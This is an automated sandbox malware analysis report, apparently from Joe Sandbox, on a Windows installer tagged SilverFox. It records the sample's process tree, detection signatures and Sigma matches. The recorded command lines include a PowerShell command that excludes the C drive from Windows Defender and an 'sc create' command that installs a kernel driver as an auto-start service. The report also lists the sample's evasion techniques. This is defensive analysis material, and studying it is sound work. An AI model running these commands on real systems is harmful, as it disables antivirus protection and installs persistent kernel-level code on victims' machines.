Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b1.0.3.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b1.0.3.exe
renamed because original name is a hash value
Original sample name:1.0.3.exe
Analysis ID:1580230
MD5:3dd1a269e502f7284674c54819e9ad8e
SHA1:f3764c08583b70e6427d8efe97e6daa1582de9a3
SHA256:9622e99ad30c7b5bef5ad85c34ea80a961f1d5d05dcc9a0083c3fa8a00966228
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: 3DD1A269E502F7284674C54819E9AD8E)
    • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 4388 cmdline: "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" MD5: CC931C68EF6CB43932F2B21773072C73)
      • powershell.exe (PID: 3204 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5236 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b1.0.3.exe (PID: 3392 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: 3DD1A269E502F7284674C54819E9AD8E)
        • #U5b89#U88c5#U52a9#U624b1.0.3.tmp (PID: 3856 cmdline: "C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$30450,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT MD5: CC931C68EF6CB43932F2B21773072C73)
          • 7zr.exe (PID: 3908 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 5536 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 4388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3908 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 1340 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5648 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5100 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4148 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5040 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5756 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2224 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1340 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5100 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5648 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3472 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6032 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 988 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2036 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5100 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5712 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5988 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5324 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7136 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1340 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5256 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2036 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4388 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1864 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6312 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6188 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3472 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5204 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5648 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4148 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1432 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4876 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1512 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6872 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6112 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1864 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6636 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 432 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2084 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6312 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1512 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5340 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5748 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4876 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1340 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, ParentProcessId: 4388, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3204, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 5100, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, ParentProcessId: 4388, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3204, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5648, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 5100, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, ParentProcessId: 4388, ParentProcessName: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 3204, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 15%Perma Link
Multi AV Scanner detection for submitted file
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeVirustotal: Detection: 6%Perma Link
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000E.00000003.2244717794.0000000001500000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000E.00000003.2244632805.0000000004010000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.14.dr
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2DAEC0 FindFirstFileA,FindClose,FindClose,8_2_6C2DAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00976868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_00976868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00977496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_00977496
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000003.2212685280.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, update.vac.8.dr, update.vac.2.dr, 7zr.exe.8.dr, hrsw.vbc.8.drString found in binary or memory: http://ocsp.digicert.com0A
